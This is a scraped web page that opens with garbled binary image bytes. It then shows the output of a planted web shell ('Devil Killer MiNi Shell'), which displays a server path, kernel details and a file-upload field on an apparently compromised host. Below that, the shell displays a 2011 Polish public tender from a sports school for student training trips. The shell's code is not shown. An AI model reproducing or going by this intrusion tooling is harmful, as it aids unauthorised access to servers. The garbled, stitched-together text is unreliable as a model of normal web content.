JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110318/88521-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - trzy grupy sportowe</b><br>
<b>Numer ogłoszenia: 88521 - 2011; data zamieszczenia: 18.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Sportowych im. Polskich Olimpijczyków , ul. Chopina 34, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 0-32 2626869, 2626968, faks 0-32 2626968.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zssdg.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - trzy grupy sportowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje realizację 3 zadań częściowych.
Zadanie 1 - Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa pływaków;
Zadanie 2 - Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa siatkarzy -2grupy;
Zadanie 3 - Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa lekkoatletów.
2. Wykonawca może złożyć ofertę na dowolną liczbę zadań tj. od 1 do 3.
3. Zadanie nr 2  tj. grupa siatkarzy obejmuje dwie grupy:  I grupa 90 osób + 7 trenerów;  II grupa  75 osób + 6 trenerów. Termin wyjazdu dla grup zgodnie z opisem.
4. Przewidywana całkowita ilość uczestników wynosi - 362 osób (młodzież - osoby płatne) + 28 opiekunów (osoby bezpłatne) - ilość uczestników może ulec zmianie (zwiększeniu lub zmniejszeniu) z przyczyn niezależnych od Zamawiającego. Przewidywaną ilość uczestników dla zadań 1-3 podano w opisie do każdego zadania.
5. Zamawiający dopuszcza możliwość zmiany liczby uczestników w poszczególnych grupach. Dokładna liczba dzieci, które zostaną skierowane na obóz, zostanie podana tydzień przed planowanym wyjazdem.
6. Czas trwania wycieczki 5 pełnych dób dla wszystkich grup (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu dla zadań nr 1,2,3.) 
7.  Szczegółowy opis warunków dla każdej z grup podano w opisie do każdego zadania. 
8.  Podane terminy dla poszczególnych zadań (od 1- 3) są terminami wymaganymi.
9.  Dzienne zapotrzebowanie energetyczne posiłków -  min. 3500 kcal.
10. W dniu przyjazdu Wykonawca przekaże Kierownikowi grupy spis planowanych posiłków na każdy dzień z podaniem kcal dla każdego posiłku. 
11. Plan posiłków powinien być zaakceptowany przez kierownika grupy.
12. Transport wliczony w cenę oferty.
13. Zamawiający zastrzega sobie możliwość obejrzenia obiektu przed podpisaniem umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wpis w rejestrze organizatorów turystyki i pośredników turystycznych - zgodnie z ustawą o usługach turystycznych z dnia 29 sierpnia 1997 r. (Dz. U. 
z 2004r., Nr 113, poz. 2268 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych są również w trakcie wykonywania, usług
w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.:

- 2 usługi, polegającej na zorganizowaniu wyjazdów turystycznych tj. wycieczki, pielgrzymki, kolonie, obozy itp., o wartości nie mniejszej niż 15.000,00 zł brutto każda, wraz z załączeniem dokumentów potwierdzających, że usługa ta została wykonana należycie, (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dodatkowo do oferty należy załączyć:
1. Druk Ofertowy - załącznik nr 3 dla Zadania 1 i (-lub) 2 i (-lub) 3 - wskazana data podpisania.
2. Wycenę przedmiotu zamówienia wykonaną w oparciu o kalkulację cenową wypoczynku młodzieży (oddzielnie dla każdego zadania) stanowiące załącznik  nr 3.1. i (-lub) 3.2. i (-lub) 3.3 - wskazana aktualna data podpisania dokumentu.
3. Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione, bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie, przedłożone w formie oryginału lub kopii   poświadczonej  przez notariusza (dotyczy również spółki cywilnej). 
4. Zobowiązanie, w szczególności pisemne, innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Atrakcyjność obiektu - 5</li>
<li>3 - Wysokość  dziennej stawki żywieniowej - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej  umowy w  stosunku do treści  oferty, na podstawie której   dokonano wyboru Wykonawcy, w zakresie:
1. zmiany terminu wykonania zamówienia oraz  terminów pośrednich, o których mowa we  wzorze umowy, w następujących przypadkach:
1.1. wystąpienie siły wyższej. Siła wyższa oznacza wydarzenie  nieprzewidywalne i  poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
1.2.wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających przeprowadzenie zamówienia np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
1.3.wystąpienia masowych zachorowań wśród uczniów, powodujące niemożliwość ich uczestniczenia w wyjeździe we wskazanym terminie, oraz  w zakresie zmiany zadeklarowanej ilości uczestników  na podstawie rzeczywistej liczby zgłoszeń złożonych przez rodziców oraz rezygnacji z udziału w wyjeździe z uzasadnionych przyczyn w terminie 7 dni przed  datą wyjazdu.  

2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1.zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zssdg.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Sportowych im. Polskich Olimpijczyków w Dąbrowie Górniczej, 41-300 Dąbrowa Górnicza, ul. Chopina 34 pokój 21 A  piętro I..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 11:00, miejsce: Zespół Szkół Sportowych  im. Polskich Olimpijczyków 41-300 Dąbrowa Górnicza, ul. Chopina 34, I piętro, pokój nr 20..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni 
spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków
zgodnie z zapisami zawartymi w pkt 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez 
dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i  oświadczenia wymienione w pkt 9.2. (ppkt 9.2.1.; 9.2.2.; SIWZ) przez każdego z  nich. Dokumenty i oświadczenia  wymienione w pkt. 9.1. SIWZ (ppkt 9.1.2. do 9.1.4. SIWZ oraz 9.3.1.; 9.3.2.; 9.3.3.; 9.3.4.;) wspólnie. Oświadczenie wymienione w pkt. 9.1.1. SIWZ - winno być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ winien być podpisany przez
uprawnionych przedstawicieli Wykonawców.
3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.

II. Wymagania dotyczące zabezpieczenia należytego wykonania umowy.
1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10% ceny brutto podanej w ofercie (dla każdego z zadań osobno).
2.Zabezpieczenie może być wnoszone w jednej lub kilku formach, zgodnie z dyspozycją Art. 148 ust.1 Ustawy.   
III. W pkt. 2.II) Ogłoszenia - Czas trwania zamówienia lub termin wykonania - Zamawiający podał w dniach (5 dni), czas trwania wycieczki szkoleniowej dla jednej grupy. Wymagany termin i czas trwania wycieczki szkoleniowej dla poszczególnych grup został podany w poszczególnych częściach Ogłoszenia od 1 do 3.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa pływaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW / TERMIN WYJAZDU
1.1. Przewidywana ilość uczestników 95 osób (młodzież osoby płatne) + 8 opiekunów (osoby bezpłatne).
1.2. Wymagany termin pobytu od 12.12.2011 r. do 17.12.2011 r.  (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).
2.MIEJSCOWOŚĆ / ŚRODEK TRANSPORTU
2.1. Miejscowość:  oddalona do 150 km od Dąbrowy Górniczej.
2.2. Środek transportu - autokar, bus.
	
3. OBIEKT / BAZA NOCLEGOWA / BAZA TRENINGOWA
3.1.Baza noclegowa - pokoje 2,3,4,5 osobowe budynek (budynki) murowany z stałym CO.  Zamawiający nie dopuszcza łóżek piętrowych.
 3.2.Osobne pokoje dla opiekunów (osobno dla kobiet i osobno mężczyzn).
3.3. Pokoje wyposażone w pełny węzeł sanitarny. 
3.4. Zakwaterowanie w jednym ośrodku wraz ze stołówką.
3.5.Basen kryty - 25 m - 2 grupy po  1,5 godz. każda rano i 2 grupy po 1,5 godz. każda po południu (łącznie 6 godzin dziennie). Basen  oddalony maksymalnie  do 10  km od miejsca zakwaterowania. W przepadku oddalenia basenu od miejsca zakwaterowania konieczne jest zapewnienie transportu. Transport wliczony w cenę oferty.
3.6.Teren z możliwością uprawiania sportów uzupełniających w treningu pływaka- trasy narciarskie, biegowe, trasy crosowe, stoki narciarskie.
4. OPIEKA MEDYCZNA
4.1. Lekarz dochodzący (na wezwanie).
4.2. Izolatka dla chorych.
4.3. Zapewnienie leków pierwszej pomocy.
5. WYŻYWIENIE
5.1.  Trzy posiłki dziennie z podwieczorkiem /śniadanie, obiad,  kolacja/.
5.2. Codziennie 0,5 l wody mineralnej niegazowanej nisko zmineralizowanej dla każdego uczestnika obozu.
5.3. Suchy prowiant na podróż, sok
6. W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
6.1. Zapewnienia bezpłatnego pobytu i przejazdu dla  opiekunów. 
6.2. Ubezpieczenie uczestników w czasie podróży i pobytu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność obiektu - 5</li>
<li>3. Wysokość  dziennej stawki żywieniowej - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa siatkarzy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW / TERMIN WYJAZDU
1.1. Przewidywana ilość uczestników  165 osób (młodzież osoby płatne) + 13 opiekunów (osoby bezpłatne).
1.2. Wymagany termin pobytu I grupa 90 uczestników +7 trenerów od 05 do 10 września 2011r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu).
1.3. Wymagany termin pobytu II grupa 75 uczestników +6 trenerów od 12 do 17 września 2011r., (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu).
2. MIEJSCOWOŚĆ / ŚRODEK TRANSPORTU
2.1. Miejscowość:  oddalona do 150 km od Dąbrowy Górniczej.
2.2. Środek transportu - autokar, bus.
3. OBIEKT / BAZA NOCLEGOWA / BAZA TRENINGOWA
3.1 Baza noclegowa - pokoje 2,3,4 osobowe. Budynek (budynki) murowany z stałym CO. Zamawiający nie dopuszcza łóżek piętrowych.
3.2  Zakwaterowanie w jednym ośrodku wraz ze stołówką.
3.3  Osobne pokoje dla opiekunów.(osobno dla kobiet i osobno mężczyzn)
3.4  Pokoje wyposażone w pełen węzeł sanitarny.
3.5  Sala gimnastyczna z możliwością rozłożenia trzech boisk pełnowymiarowych do siatkówki lub trzech sal  pełnowymiarowych oddalonych do 2 km od miejsca zakwaterowania. W przepadku oddalenia sal od miejsca zakwaterowania większym niż 2 km konieczne jest zapewnienie transportu. Transport wliczony w cenę oferty. Treningi dwa razy dziennie w godzinach od 10.00. do 13.00 i od 16.00 do 19.00 
(Kolacja wydawana nie wcześniej niż o godz. 19.45).
4. OPIEKA MEDYCZNA
4.1. Lekarz dochodzący (na wezwanie).
4.2. Izolatka dla chorych.
4.3. Zapewnienie leków pierwszej pomocy.
5. WYŻYWIENIE
5.1. Trzy posiłki dziennie z podwieczorkiem /śniadanie, obiad,  kolacja/.
5.2. Codziennie 0,5 l wody mineralnej niegazowanej nisko zmineralizowanej dla każdego uczestnika obozu.
5.3. Suchy prowiant na podróż, sok
6.W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
6.1. Zapewnienia bezpłatnego pobytu i przejazdu dla  opiekunów. 
6.2. Ubezpieczenie uczestników w czasie podróży i pobytu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność obiektu - 5</li>
<li>3. Wysokość  dziennej stawki żywieniowej - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa lekkoatletów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW / TERMIN WYJAZDU
1.1. Przewidywana ilość uczestników  102 osób (młodzież osoby płatne) + 7 opiekunów (osoby bezpłatne).
1.2. Wymagany termin pobytu od 18.09.2011 r. do 23.09.2011 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).
2. MIEJSCOWOŚĆ / ŚRODEK TRANSPORTU
2.1. Miejscowość:  oddalona do 200 km od Dąbrowy Górniczej.
2.2. Środek transportu - autokar, bus.
3.OBIEKT / BAZA NOCLEGOWA / BAZA TRENINGOWA
3.1  Baza noclegowa - pokoje 2,3,4 osobowe, budynek (budynki) murowane ze stałym CO
3.2  Zakwaterowanie w jednym ośrodku wraz ze stołówką.
3.3  Osobne pokoje dla opiekunów (osobno dla kobiet i osobno mężczyzn).
3.4  Pokoje wyposażone w pełen węzeł sanitarny.
